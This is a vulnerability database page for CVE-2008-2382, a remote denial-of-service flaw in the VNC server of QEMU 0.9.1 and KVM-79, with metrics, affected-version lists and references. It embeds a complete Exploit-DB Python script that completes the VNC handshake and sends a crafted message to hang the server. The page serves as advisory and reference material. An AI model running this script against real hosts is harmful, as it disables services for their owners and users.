CVE-2008-2382 Detail

CVE-2008-2382

EPSS

10.01%V3

Vector

Network

Published

2008-12-24
16h00 +00:00

Modified

2018-10-11
17h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

The protocol_client_msg function in vnc.c in the VNC server in (1) Qemu 0.9.1 and earlier and (2) KVM kvm-79 and earlier allows remote attackers to cause a denial of service (infinite loop) via a certain message.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-399	Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	5		AV:N/AC:L/Au:N/C:N/I:N/A:P	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 32675

Publication date : 2008-12-21
23h00 +00:00
Author : Alfredo Ortega
EDB Verified : Yes

source: https://www.securityfocus.com/bid/32910/info QEMU and KVM are prone to a remote denial-of-service vulnerability that affects the included VNC server. Attackers can exploit this issue to create a denial-of-service condition. The following are vulnerable: QEMU 0.9.1 and prior KVM-79 and prior ## ## vnc remote DoS ## import socket import time import struct import sys if len(sys.argv)<3: print "Usage: %s host port" % sys.argv[0] exit(0) host = sys.argv[1] # "127.0.0.1" # debian 4 port = int(sys.argv[2]) # 5900 s =socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((host,port)) # rec-send versions srvversion = s.recv(100) cliversion=srvversion s.send(cliversion) print "Server version: %s" % srvversion #Security types sec=s.recv(100) print "Number of security types: %d" % ord(sec[0]) s.send(sec[1]) # Authentication result auth=s.recv(100) if auth=="\x00\x00\x00\x00": print "Auth ok." # Share desktop flag: no s.send("\x00") # Server framebuffer parameters: framebuf=s.recv(100) # Trigger the bug s.send("\x02\x00\x00\x00\x00\xff"+struct.pack("<L",1)*5) s.close()

Products Mentioned

Configuraton 0

Qemu>>Qemu >> Version To (including) 0.9.1

Qemu>>Qemu >> Version - (Open CPE detail)
Qemu>>Qemu >> Version 0.1 (Open CPE detail)
Qemu>>Qemu >> Version 0.1.0 (Open CPE detail)
Qemu>>Qemu >> Version 0.1.1 (Open CPE detail)
Qemu>>Qemu >> Version 0.1.2 (Open CPE detail)
Qemu>>Qemu >> Version 0.1.3 (Open CPE detail)
Qemu>>Qemu >> Version 0.1.4 (Open CPE detail)
Qemu>>Qemu >> Version 0.1.5 (Open CPE detail)
Qemu>>Qemu >> Version 0.1.6 (Open CPE detail)
Qemu>>Qemu >> Version 0.2 (Open CPE detail)
Qemu>>Qemu >> Version 0.2.0 (Open CPE detail)
Qemu>>Qemu >> Version 0.3 (Open CPE detail)
Qemu>>Qemu >> Version 0.3.0 (Open CPE detail)
Qemu>>Qemu >> Version 0.4 (Open CPE detail)
Qemu>>Qemu >> Version 0.4.0 (Open CPE detail)
Qemu>>Qemu >> Version 0.4.1 (Open CPE detail)
Qemu>>Qemu >> Version 0.4.2 (Open CPE detail)
Qemu>>Qemu >> Version 0.4.3 (Open CPE detail)
Qemu>>Qemu >> Version 0.4.4 (Open CPE detail)
Qemu>>Qemu >> Version 0.5.0 (Open CPE detail)
Qemu>>Qemu >> Version 0.5.1 (Open CPE detail)
Qemu>>Qemu >> Version 0.5.2 (Open CPE detail)
Qemu>>Qemu >> Version 0.5.3 (Open CPE detail)
Qemu>>Qemu >> Version 0.5.4 (Open CPE detail)
Qemu>>Qemu >> Version 0.5.5 (Open CPE detail)
Qemu>>Qemu >> Version 0.6.0 (Open CPE detail)
Qemu>>Qemu >> Version 0.6.1 (Open CPE detail)
Qemu>>Qemu >> Version 0.7.0 (Open CPE detail)
Qemu>>Qemu >> Version 0.7.1 (Open CPE detail)
Qemu>>Qemu >> Version 0.7.2 (Open CPE detail)
Qemu>>Qemu >> Version 0.8.0 (Open CPE detail)
Qemu>>Qemu >> Version 0.8.1 (Open CPE detail)
Qemu>>Qemu >> Version 0.8.2 (Open CPE detail)
Qemu>>Qemu >> Version 0.9.0 (Open CPE detail)
Qemu>>Qemu >> Version 0.9.1 (Open CPE detail)

Qemu>>Qemu >> Version 0.1.0

Qemu>>Qemu >> Version 0.1.0 (Open CPE detail)

Qemu>>Qemu >> Version 0.1.1

Qemu>>Qemu >> Version 0.1.1 (Open CPE detail)

Qemu>>Qemu >> Version 0.1.2

Qemu>>Qemu >> Version 0.1.2 (Open CPE detail)

Qemu>>Qemu >> Version 0.1.3

Qemu>>Qemu >> Version 0.1.3 (Open CPE detail)

Qemu>>Qemu >> Version 0.1.4

Qemu>>Qemu >> Version 0.1.4 (Open CPE detail)

Qemu>>Qemu >> Version 0.1.5

Qemu>>Qemu >> Version 0.1.5 (Open CPE detail)

Qemu>>Qemu >> Version 0.1.6

Qemu>>Qemu >> Version 0.1.6 (Open CPE detail)

Qemu>>Qemu >> Version 0.2.0

Qemu>>Qemu >> Version 0.2.0 (Open CPE detail)

Qemu>>Qemu >> Version 0.3.0

Qemu>>Qemu >> Version 0.3.0 (Open CPE detail)

Qemu>>Qemu >> Version 0.4.0

Qemu>>Qemu >> Version 0.4.0 (Open CPE detail)

Qemu>>Qemu >> Version 0.4.1

Qemu>>Qemu >> Version 0.4.1 (Open CPE detail)

Qemu>>Qemu >> Version 0.4.2

Qemu>>Qemu >> Version 0.4.2 (Open CPE detail)

Qemu>>Qemu >> Version 0.4.3

Qemu>>Qemu >> Version 0.4.3 (Open CPE detail)

Qemu>>Qemu >> Version 0.5.0

Qemu>>Qemu >> Version 0.5.0 (Open CPE detail)

Qemu>>Qemu >> Version 0.5.1

Qemu>>Qemu >> Version 0.5.1 (Open CPE detail)

Qemu>>Qemu >> Version 0.5.2

Qemu>>Qemu >> Version 0.5.2 (Open CPE detail)

Qemu>>Qemu >> Version 0.5.3

Qemu>>Qemu >> Version 0.5.3 (Open CPE detail)

Qemu>>Qemu >> Version 0.5.4

Qemu>>Qemu >> Version 0.5.4 (Open CPE detail)

Qemu>>Qemu >> Version 0.5.5

Qemu>>Qemu >> Version 0.5.5 (Open CPE detail)

Qemu>>Qemu >> Version 0.6.0

Qemu>>Qemu >> Version 0.6.0 (Open CPE detail)

Qemu>>Qemu >> Version 0.6.1

Qemu>>Qemu >> Version 0.6.1 (Open CPE detail)

Qemu>>Qemu >> Version 0.7.0

Qemu>>Qemu >> Version 0.7.0 (Open CPE detail)

Qemu>>Qemu >> Version 0.7.1

Qemu>>Qemu >> Version 0.7.1 (Open CPE detail)

Qemu>>Qemu >> Version 0.7.2

Qemu>>Qemu >> Version 0.7.2 (Open CPE detail)

Qemu>>Qemu >> Version 0.8.0

Qemu>>Qemu >> Version 0.8.0 (Open CPE detail)

Qemu>>Qemu >> Version 0.8.1

Qemu>>Qemu >> Version 0.8.1 (Open CPE detail)

Qemu>>Qemu >> Version 0.8.2

Qemu>>Qemu >> Version 0.8.2 (Open CPE detail)

Qemu>>Qemu >> Version 0.9.0

Qemu>>Qemu >> Version 0.9.0 (Open CPE detail)

Configuraton 0

Kvm_qumranet>>Kvm >> Version To (including) 79

Kvm_qumranet>>Kvm >> Version 1

Kvm_qumranet>>Kvm >> Version 2

Kvm_qumranet>>Kvm >> Version 3

Kvm_qumranet>>Kvm >> Version 4

Kvm_qumranet>>Kvm >> Version 5

Kvm_qumranet>>Kvm >> Version 6

Kvm_qumranet>>Kvm >> Version 7

Kvm_qumranet>>Kvm >> Version 8

Kvm_qumranet>>Kvm >> Version 9

Kvm_qumranet>>Kvm >> Version 10

Kvm_qumranet>>Kvm >> Version 11

Kvm_qumranet>>Kvm >> Version 12

Kvm_qumranet>>Kvm >> Version 13

Kvm_qumranet>>Kvm >> Version 14

Kvm_qumranet>>Kvm >> Version 15

Kvm_qumranet>>Kvm >> Version 16

Kvm_qumranet>>Kvm >> Version 17

Kvm_qumranet>>Kvm >> Version 18

Kvm_qumranet>>Kvm >> Version 19

Kvm_qumranet>>Kvm >> Version 20

Kvm_qumranet>>Kvm >> Version 21

Kvm_qumranet>>Kvm >> Version 22

Kvm_qumranet>>Kvm >> Version 23

Kvm_qumranet>>Kvm >> Version 24

Kvm_qumranet>>Kvm >> Version 25

Kvm_qumranet>>Kvm >> Version 26

Kvm_qumranet>>Kvm >> Version 27

Kvm_qumranet>>Kvm >> Version 28

Kvm_qumranet>>Kvm >> Version 29

Kvm_qumranet>>Kvm >> Version 30

Kvm_qumranet>>Kvm >> Version 31

Kvm_qumranet>>Kvm >> Version 32

Kvm_qumranet>>Kvm >> Version 33

Kvm_qumranet>>Kvm >> Version 34

Kvm_qumranet>>Kvm >> Version 35

Kvm_qumranet>>Kvm >> Version 36

Kvm_qumranet>>Kvm >> Version 37

Kvm_qumranet>>Kvm >> Version 38

Kvm_qumranet>>Kvm >> Version 39

Kvm_qumranet>>Kvm >> Version 40

Kvm_qumranet>>Kvm >> Version 41

Kvm_qumranet>>Kvm >> Version 42

Kvm_qumranet>>Kvm >> Version 43

Kvm_qumranet>>Kvm >> Version 44

Kvm_qumranet>>Kvm >> Version 45

Kvm_qumranet>>Kvm >> Version 46

Kvm_qumranet>>Kvm >> Version 47

Kvm_qumranet>>Kvm >> Version 48

Kvm_qumranet>>Kvm >> Version 49

Kvm_qumranet>>Kvm >> Version 50

Kvm_qumranet>>Kvm >> Version 51

Kvm_qumranet>>Kvm >> Version 52

Kvm_qumranet>>Kvm >> Version 53

Kvm_qumranet>>Kvm >> Version 54

Kvm_qumranet>>Kvm >> Version 55

Kvm_qumranet>>Kvm >> Version 56

Kvm_qumranet>>Kvm >> Version 57

Kvm_qumranet>>Kvm >> Version 58

Kvm_qumranet>>Kvm >> Version 59

Kvm_qumranet>>Kvm >> Version 60

Kvm_qumranet>>Kvm >> Version 61

Kvm_qumranet>>Kvm >> Version 62

Kvm_qumranet>>Kvm >> Version 63

Kvm_qumranet>>Kvm >> Version 64

Kvm_qumranet>>Kvm >> Version 65

Kvm_qumranet>>Kvm >> Version 66

Kvm_qumranet>>Kvm >> Version 67

Kvm_qumranet>>Kvm >> Version 68

Kvm_qumranet>>Kvm >> Version 69

Kvm_qumranet>>Kvm >> Version 70

Kvm_qumranet>>Kvm >> Version 71

Kvm_qumranet>>Kvm >> Version 72

Kvm_qumranet>>Kvm >> Version 73

Kvm_qumranet>>Kvm >> Version 74

Kvm_qumranet>>Kvm >> Version 75

Kvm_qumranet>>Kvm >> Version 76

Kvm_qumranet>>Kvm >> Version 77

Kvm_qumranet>>Kvm >> Version 78

References

http://secunia.com/advisories/35062
Tags : third-party-advisory, x_refsource_SECUNIA

http://securitytracker.com/id?1021489
Tags : vdb-entry, x_refsource_SECTRACK

http://securityreason.com/securityalert/4803
Tags : third-party-advisory, x_refsource_SREASON

http://www.vupen.com/english/advisories/2008/3488
Tags : vdb-entry, x_refsource_VUPEN

https://www.redhat.com/archives/fedora-package-announce/2008-December/msg01223.html
Tags : vendor-advisory, x_refsource_FEDORA

http://secunia.com/advisories/33303
Tags : third-party-advisory, x_refsource_SECUNIA

http://secunia.com/advisories/34642
Tags : third-party-advisory, x_refsource_SECUNIA

http://secunia.com/advisories/33293
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.ubuntu.com/usn/usn-776-1
Tags : vendor-advisory, x_refsource_UBUNTU

http://secunia.com/advisories/33350
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.coresecurity.com/content/vnc-remote-dos
Tags : x_refsource_MISC

http://lists.opensuse.org/opensuse-security-announce/2009-01/msg00004.html
Tags : vendor-advisory, x_refsource_SUSE

http://secunia.com/advisories/33568
Tags : third-party-advisory, x_refsource_SECUNIA

http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00003.html
Tags : vendor-advisory, x_refsource_SUSE

http://www.securityfocus.com/archive/1/499502/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ

http://securitytracker.com/id?1021488
Tags : vdb-entry, x_refsource_SECTRACK

http://www.securityfocus.com/bid/32910
Tags : vdb-entry, x_refsource_BID

http://www.vupen.com/english/advisories/2008/3489
Tags : vdb-entry, x_refsource_VUPEN

https://exchange.xforce.ibmcloud.com/vulnerabilities/47561
Tags : vdb-entry, x_refsource_XF

CVE-2008-2382 : Detail

CVE-2008-2382

CVE Descriptions

CVE Informations

Related Weaknesses

Metrics

EPSS

EPSS Score

EPSS Percentile

Exploit information

Exploit Database EDB-ID : 32675

Products Mentioned

Configuraton 0

Configuraton 0

References